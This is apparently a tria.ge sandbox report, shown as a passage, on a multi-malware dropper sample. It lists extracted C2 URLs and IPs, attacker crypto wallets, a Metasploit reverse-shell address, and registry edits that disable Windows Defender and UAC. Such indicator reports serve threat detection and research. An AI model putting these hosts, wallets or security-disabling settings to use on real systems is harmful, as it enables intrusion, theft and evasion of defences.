Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
27/02/2025, 06:33
250227-hbn4tszmx7 1026/02/2025, 23:57
250226-3zn4ysxwc1 1026/02/2025, 23:14
250226-271x2sxmz9 1014/02/2025, 01:10
250214-bjsnnayne1 1014/02/2025, 01:00
250214-bc5pmsymhw 1013/02/2025, 05:01
250213-fnkwtstpgw 1013/02/2025, 04:24
250213-e1kk6atmaz 1013/02/2025, 04:08
250213-eqe8patkgx 812/02/2025, 23:56
250212-3yzt3azrdx 10Analysis
-
max time kernel
299s -
max time network
301s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26/11/2024, 19:26
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240903-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
-
mutex
753f85d83d
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
metasploit
windows/reverse_tcp
103.42.55.251:8080
Extracted
lumma
https://powerful-avoids.sbs
https://motion-treesz.sbs
https://disobey-curly.sbs
https://leg-sate-boat.sbs
https://story-tense-faz.sbs
https://blade-govern.sbs
https://occupy-blushi.sbs
https://frogs-severz.sbs
https://push-hook.cyou
Extracted
phorphiex
http://185.215.113.84
Extracted
redline
38.180.109.140:20007
Extracted
asyncrat
0.5.8
Default
18.ip.gl.ply.gg:6606
18.ip.gl.ply.gg:7707
18.ip.gl.ply.gg:8808
18.ip.gl.ply.gg:9028
7U2HW8ZYjc9H
-
delay
3
-
install
true
-
install_file
Discord.exe
-
install_folder
%AppData%
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
redline
814FA
88.99.151.68:7200
Extracted
asyncrat
0.5.7B
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://push-hook.cyou/api
https://blade-govern.sbs/api
https://story-tense-faz.sbs/api
https://disobey-curly.sbs/api
https://motion-treesz.sbs/api
https://powerful-avoids.sbs/api
Signatures
-
Asyncrat family
-
Lumma family
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 32b1c3a712.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 32b1c3a712.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 32b1c3a712.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 32b1c3a712.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 32b1c3a712.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 32b1c3a712.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3" Defender.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3" Defender.exe -
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x000e000000016ee0-65.dat family_phorphiex -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/memory/2164-438-0x0000000000DF0000-0x0000000000E42000-memory.dmp family_redline behavioral1/memory/2900-887-0x0000000000090000-0x00000000000E2000-memory.dmp family_redline -
Redline family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 852 created 1208 852 2063426219.exe 21 PID 852 created 1208 852 2063426219.exe 21 PID 1540 created 1208 1540 winupsecvmgr.exe 21 PID 1540 created 1208 1540 winupsecvmgr.exe 21 PID 1540 created 1208 1540 winupsecvmgr.exe 21 PID 2724 created 1208 2724 AddInProcess32.exe 21 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Xmrig family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000b00000001a4cb-524.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ DocumentsIEHDAFHDHC.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 17b5adcd83.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a077d9ad88.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 32b1c3a712.exe -
XMRig Miner payload 4 IoCs
resource yara_rule behavioral1/memory/1540-418-0x000000013F6C0000-0x000000013FC57000-memory.dmp xmrig behavioral1/memory/1140-424-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1140-555-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1140-769-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 336 attrib.exe -
Uses browser remote debugging 2 TTPs 7 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1780 chrome.exe 2948 chrome.exe 1060 chrome.exe 3364 chrome.exe 2892 chrome.exe 2972 chrome.exe 1544 chrome.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DocumentsIEHDAFHDHC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DocumentsIEHDAFHDHC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 17b5adcd83.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a077d9ad88.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32b1c3a712.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 17b5adcd83.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a077d9ad88.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32b1c3a712.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe -
Drops startup file 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bypass.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Process.exe cmd.exe -
Executes dropped EXE 64 IoCs
pid Process 2656 tdrpload.exe 236 sysnldcvmr.exe 1048 abc.exe 2608 crypted.exe 2964 1321710862.exe 3052 dkasjhajksdhdjkas.exe 2520 av_downloader.exe 624 AV_DOW~1.EXE 2756 test10.exe 2796 vg9qcBa.exe 2640 vg9qcBa.exe 2976 MePaxil.exe 2344 110673311.exe 112 Legend.pif 852 2063426219.exe 2824 3131330974.exe 1540 winupsecvmgr.exe 2848 367219602.exe 1072 3866813154.exe 1580 up.exe 2164 kiyan.exe 1636 Discord3.exe 1804 random.exe 2264 Discord.exe 1516 maza-0.16.3-win64-setup-unsigned.exe 1280 pp.exe 2872 soft.exe 1616 2892715595.exe 2328 maza-qt.exe 2768 hashed.exe 1884 GoogleUpdate.exe 2764 HKZINHMZHBGY0.exe 1788 DocumentsIEHDAFHDHC.exe 3008 skotes.exe 2900 RegAsm.exe 2844 x4lburt.exe 2976 computerlead.exe 2112 vg9qcBa.exe 2320 vg9qcBa.exe 316 VBVEd6f.exe 1048 17b5adcd83.exe 3496 a077d9ad88.exe 3812 fdf86a2bc0.exe 3956 32b1c3a712.exe 3092 Set_up.exe 3568 morphic.exe 4232 legas.exe 4380 CCU5HWRV8s.exe 4408 oPK9X0q98z.exe 4664 RegAsm.exe 2240 key.exe 4644 AsyncClient.exe 4668 zx.exe 3368 zx.exe 3604 NVIDIA.exe 1360 soft.exe 3264 ScanGuard.pif 3580 cudo.exe 3372 S%D0%B5tup.exe 4512 nguyentri38.exe 4580 Bypass.exe 1920 Defender.exe 4456 Defender.exe 316 newtpp.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine 32b1c3a712.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine DocumentsIEHDAFHDHC.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine 17b5adcd83.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine a077d9ad88.exe -
Loads dropped DLL 64 IoCs
pid Process 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 236 sysnldcvmr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2072 4363463463464363463463463.exe 1892 Process not Found 2644 taskmgr.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2644 taskmgr.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2796 vg9qcBa.exe 2072 4363463463464363463463463.exe 236 sysnldcvmr.exe 1760 cmd.exe 2344 110673311.exe 2644 taskmgr.exe 236 sysnldcvmr.exe 1648 taskeng.exe 2644 taskmgr.exe 236 sysnldcvmr.exe 2848 367219602.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2204 cmd.exe 2072 4363463463464363463463463.exe 1516 maza-0.16.3-win64-setup-unsigned.exe 1516 maza-0.16.3-win64-setup-unsigned.exe 2072 4363463463464363463463463.exe 1516 maza-0.16.3-win64-setup-unsigned.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 1280 pp.exe 1280 pp.exe 1516 maza-0.16.3-win64-setup-unsigned.exe 1516 maza-0.16.3-win64-setup-unsigned.exe 1516 maza-0.16.3-win64-setup-unsigned.exe 1804 random.exe 1804 random.exe 112 Legend.pif 1516 maza-0.16.3-win64-setup-unsigned.exe 1516 maza-0.16.3-win64-setup-unsigned.exe 1208 Explorer.EXE 1208 Explorer.EXE 1208 Explorer.EXE 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 2072 4363463463464363463463463.exe 1404 RegAsm.exe 1028 cmd.exe 1028 cmd.exe 2644 taskmgr.exe 2644 taskmgr.exe 1788 DocumentsIEHDAFHDHC.exe 1788 DocumentsIEHDAFHDHC.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 32b1c3a712.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 32b1c3a712.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection Defender.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1" Defender.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection Defender.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Defender.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\17b5adcd83.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009360001\\17b5adcd83.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\a077d9ad88.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009361001\\a077d9ad88.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\fdf86a2bc0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009362001\\fdf86a2bc0.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\32b1c3a712.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009363001\\32b1c3a712.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive = "\"C:\\ProgramData\\OneDrive\\OneDrive.exe\"" bildnewl.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Iujxnv = "C:\\Users\\Admin\\AppData\\Roaming\\Iujxnv.exe" DIFF.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" tdrpload.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" x4lburt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 1492 powershell.exe 2904 powershell.exe 1892 powershell.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 18 raw.githubusercontent.com 19 raw.githubusercontent.com 527 raw.githubusercontent.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000600000001c321-1207.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol Defender.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini Defender.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2804 tasklist.exe 2996 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 1804 random.exe 1788 DocumentsIEHDAFHDHC.exe 3008 skotes.exe 1048 17b5adcd83.exe 3496 a077d9ad88.exe 3956 32b1c3a712.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 2608 set thread context of 304 2608 crypted.exe 37 PID 2796 set thread context of 2640 2796 vg9qcBa.exe 63 PID 1540 set thread context of 1488 1540 winupsecvmgr.exe 97 PID 1540 set thread context of 1140 1540 winupsecvmgr.exe 98 PID 1884 set thread context of 1404 1884 GoogleUpdate.exe 132 PID 2112 set thread context of 2320 2112 vg9qcBa.exe 147 PID 4232 set thread context of 4256 4232 legas.exe 213 PID 2976 set thread context of 2724 2976 computerlead.exe 205 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Maza\doc\man\maza-cli.1 maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.15.1.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.8.1.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\daemon\mazad.exe maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.3.23.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.3.24.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.4.0.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.9.2.1.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.13.1.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.3.12.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.3.20.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.7.1.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\README_windows.txt maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\REST-interface.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes-litecoincash.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\zmq.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\man\Makefile maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.3.22.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\gitian-building.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.13.2.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\fuzzing.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.5.4.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.6.3.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.9.4.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\README.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\build-netbsd.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\dnsseed-policy.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\shared-libraries.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.4.6.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\benchmarking.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\translation_strings_policy.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\man\Makefile.am maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.9.0.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.11.0.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.5.1.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\assets-attribution.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\init.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\tor.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\man\maza-qt.1 maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.6.2.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\readme.txt maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\bips.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.3.18.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.9.1.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.9.3.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\travis-ci.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.14.2.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.3.21.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.6.0.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.9.2.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\COPYING.txt maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.3.19.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\build-osx.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\files.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.14.0.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.8.6.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\uninstall.exe maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\daemon\maza-cli.exe maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\build-openbsd.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\build-windows.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\dependencies.md maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\man\Makefile.in maza-0.16.3-win64-setup-unsigned.exe File created C:\Program Files\Maza\doc\release-notes\release-notes-0.10.0.md maza-0.16.3-win64-setup-unsigned.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\sysnldcvmr.exe tdrpload.exe File opened for modification C:\Windows\sysnldcvmr.exe tdrpload.exe File created C:\Windows\Tasks\skotes.job DocumentsIEHDAFHDHC.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2400 mshta.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4320 4232 WerFault.exe 212 4472 2240 WerFault.exe 221 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 110673311.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoogleUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DocumentsIEHDAFHDHC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Defender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Defender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened 